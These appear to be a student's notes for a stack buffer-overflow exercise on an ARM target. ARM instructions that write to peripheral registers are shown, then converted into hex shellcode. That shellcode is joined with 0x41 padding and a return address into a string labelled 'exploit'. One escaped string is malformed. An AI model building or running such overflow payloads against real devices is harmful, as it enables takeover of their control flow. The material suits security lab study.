MOVW R2,#8100
MOVT R2,#4802
MOVW R1,#8080
STRH R1,[R2,#16]
MOV R1, #3
STRB R1,[R2,#0]


A42F01E3
C22241E3
901F01E3
B011C2E1
0310A0E3
0010C2E5

**********
48F20012




**********

A42F01E3C22241E3901F01E3B011C2E10310A0E30010C2E5

"\xA4x\2Fx\01x\E3x\C2x\22x\41x\E3x\90x\1Fx\01x\E3x\B0x\11x\C2x\E1x\03x\10x\A0x\E3x\00x\10x\C2x\E5"

shell code = "\xA4\x2F\x01\xE3\xC2\x22\x41\xE3\x90\x1F\x01\xE3\xB0\x11\xC2\xE1\x03\x10\xA0\xE3\x00\x10\xC2\xE5"

beginning of stack = "\x98\x07\x00\x10"

exploit = "\xA4\x2F\x01\xE3\xC2\x22\x41\xE3\x90\x1F\x01\xE3\xB0\x11\xC2\xE1\x03\x10\xA0\xE3\x00\x10\xC2\xE5\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x98\x07\x00\x10"

A = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
